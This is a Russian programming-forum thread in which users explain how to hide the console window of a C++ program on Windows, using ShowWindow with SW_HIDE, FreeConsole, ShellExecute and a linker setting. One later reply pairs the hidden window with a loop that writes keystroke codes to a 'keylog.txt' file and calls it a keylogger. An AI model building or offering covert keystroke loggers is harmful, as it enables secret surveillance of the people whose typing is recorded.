Форум программистов, компьютерный форум CyberForum.ru
Наши страницы

С++ для начинающих

Войти
Регистрация
Восстановить пароль
 
Рейтинг: Рейтинг темы: голосов - 53, средняя оценка - 4.98
Dani
1393 / 637 / 57
Регистрация: 11.08.2011
Сообщений: 2,282
Записей в блоге: 2
Завершенные тесты: 1
#1

Можно ли спрятать консоль в C++, и если да, то как? - C++

28.08.2011, 12:17. Просмотров 7669. Ответов 9
Метки нет (Все метки)

Можно-ли спрятать консоль в с++, если да, то как?
(спрятать - чтобы она не отображалась графически)
А за одно какие для этого подключать библиотеки и какие аргументы в этих функциях.
0
Similar
Эксперт
41792 / 34177 / 6122
Регистрация: 12.04.2006
Сообщений: 57,940
28.08.2011, 12:17
Здравствуйте! Я подобрал для вас темы с ответами на вопрос Можно ли спрятать консоль в C++, и если да, то как? (C++):

Можно ли не показывать (спрятать) консоль? - C++
Чтоб консоль не отображалась,но выполняла все что в коде.

Можно ли как-то осуществить вывод кириллицы в консоль, не используя Lucida Console - C++
Собственно сабж в заголовке. Есть способ оставить стандартный Consolas?

Как увеличить максимальное количество символов, которое можно ввести в консоль? - C++
Я использую функцию cin.getline(article, 9999);Как видите, количество символов для ввода стоит 9999, но на практике консоль принимает...

Выяснить можно ли с поля (k,l) одним ходом ферьзя попасть на поле(m,n). Если нет, то выяснить, как это можно сделать за два хода - C++
Поле шахмотной доски определяеся парой натуральных чисел, каждая из которых не превосходит восьми: первое число номер вертикали (при счете...

Как спрятать консоль? - C#
Есть проблема - в винформах метод this.Hide() прятал форму в процессы. К сожалению это не работает с консолью. Есть ли аналог?

как спрятать строку, если нет данных? - PHP
Здравствуйте! я в пхп полный 0. подскажите как сделать: Есть такая строка <td> <b><?php print _JSHOP_ORDER_NUMBER ?>:</b> <?php...

Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
insolent
826 / 347 / 15
Регистрация: 30.01.2009
Сообщений: 1,204
28.08.2011, 13:02 #2
Dani, если пишешь под винду,в Visual Studio, просто выбери при создании пустой проект "Windows Application" или можно также запустить консольное приложение через другую программу, которая сделает так, что бы окно не показвалось ( SW_HIDE ), например:
C++
1
2
3
4
5
6
7
8
9
10
#include <shellapi.h>
 
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
ShellExecute(0,"open",lpCmdLine,0,0,SW_HIDE);
return 0;
}
2
Dani
1393 / 637 / 57
Регистрация: 11.08.2011
Сообщений: 2,282
Записей в блоге: 2
Завершенные тесты: 1
29.08.2011, 22:50  [ТС] #3
Нашел такое
C++
1
2
3
4
5
6
#include <windows.h>
using namespace std;
int main()
{
    HWND hWnd = GetConsoleWindow();
    showwindow(hWnd, SW_HIDE);
Но выдает ошибку, на строке инициализации. Не скажите в чем проблема?
0
Петррр
5958 / 3395 / 337
Регистрация: 28.10.2010
Сообщений: 5,926
29.08.2011, 23:47 #4
C++
1
2
3
4
5
6
7
8
9
#include <iostream>
#include <windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    system("pause");
}
C++ регистрозависимый.
1
Dani
1393 / 637 / 57
Регистрация: 11.08.2011
Сообщений: 2,282
Записей в блоге: 2
Завершенные тесты: 1
30.08.2011, 00:17  [ТС] #5
Цитата Сообщение от Петррр Посмотреть сообщение
C++ регистрозависимый.
Да, только все-равно ошибка.
Код
GetConsoleWindow undeclared
Но вродеж поставил #include <windows.h> и using
0
Петррр
5958 / 3395 / 337
Регистрация: 28.10.2010
Сообщений: 5,926
30.08.2011, 00:28 #6
Скажите какая ошибка.
0
insolent
826 / 347 / 15
Регистрация: 30.01.2009
Сообщений: 1,204
30.08.2011, 02:29 #7
Попробуйте в начало добавить
C++
1
#define _WIN32_WINNT 0x0500
Kernel32.lib подключен?
0
OstapBender
583 / 521 / 35
Регистрация: 22.03.2011
Сообщений: 1,585
30.08.2011, 02:32 #8
убрать окошко из которого запущена программа - FreeConsole();
2
Miwa123
37 / 37 / 1
Регистрация: 16.04.2013
Сообщений: 317
Записей в блоге: 1
17.08.2013, 11:47 #9
C++
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <iostream>
#include <conio.h>
#include <fstream>
#include <Windows.h>
 
int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);
    int c;
    std::ofstream keylog("keylog.txt");
    while((c = getch()) != 8)
    {
        keylog<<c<<" ";
    }
    system("pause");
}
в файл записывается кодировка символов в системе ANSI(во избежание многих проблем). расшифровать легко: в гугле ANSI и изображения. остановка роботы программы происходит когда нажмешь backspace + один любой символ. зайди в корень там создался файлик keylog.txt в нем куча цифр это и будут нажатые клавиши! если что-то непонятно пиши в личку. подскажу!
0
Pavlin27
1 / 1 / 1
Регистрация: 24.09.2016
Сообщений: 6
Завершенные тесты: 1
24.09.2016, 19:14 #10
В visual c++ 6 мне помогло:
C++
1
#pragma comment(linker, "/subsystem:windows /ENTRY:mainCRTStartup")
0
MoreAnswers
Эксперт
37091 / 29110 / 5898
Регистрация: 17.06.2006
Сообщений: 43,301
24.09.2016, 19:14
Привет! Вот еще темы с ответами:

Как можно спрятать некоторую область на листе - VBA
Т.е. чтобы она не печаталась

Как можно спрятать расширение .aspx в адресной строке? - C# ASP.NET
Привет всем! Скажите, как можно спрятать расширение .aspx в адресной строке?

Спрятать или убрать консоль при запуске приложения - PascalABC.NET
Доброго времени суток! Мне не хватает пары моментов. 1) Нужно спрятать или вообще убрать консоль при запуске приложения. {$apptype...

Как можно обнулить весь массив если и если не задавать диапазон? - C#
следующие способы результатов не приносят massiv1 = null; massiv1.Clear();


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
Yandex
Объявления
24.09.2016, 19:14
Ответ Создать тему
Опции темы

КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin® Version 3.8.9
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Рейтинг@Mail.ru